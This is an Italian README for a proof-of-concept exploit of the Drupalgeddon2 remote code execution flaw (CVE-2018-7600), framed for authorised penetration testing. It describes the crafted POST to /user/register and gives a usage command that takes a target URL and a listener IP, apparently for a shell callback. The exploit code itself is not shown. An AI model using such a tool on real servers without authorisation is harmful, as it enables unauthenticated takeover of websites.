
PoC di CVE-2018-7600
DICHIARAZIONE DI NON RESPONSABILITÀ:
Questo progetto è solo per scopi educativi e di test di penetrazione autorizzati.
NON utilizzare questo codice su sistemi che non possiedi o per i quali non hai esplicito permesso scritto per il test.
L'uso non autorizzato è illegale e punibile per legge.
L'autore non si assume alcuna responsabilità per un uso improprio di questo strumento.
Questo script Python3 sfrutta la vulnerabilità CVE-2018-7600 (Drupalgeddon2) — un bug critico di Remote Code Execution (RCE) che colpisce diverse versioni di Drupal. La vulnerabilità consente agli attaccanti di eseguire comandi arbitrari su un server vulnerabile senza autenticazione. Questo exploit invia un payload dannoso tramite una richiesta POST appositamente modificata all'endpoint /user/register, sfruttando il rendering dei moduli AJAX di Drupal per eseguire comandi di sistema.
Inoltre, lo script include:
Drupal 7.x e 8.x (prima delle versioni corrette di marzo 2018) sono vulnerabili.
Per i dettagli, vedere:
🔗 Drupal Security Advisory
Installa i moduli Python richiesti:
pip install requests termcolor
python3 exploit.py <TARGET_URL> <LISTENER_IP>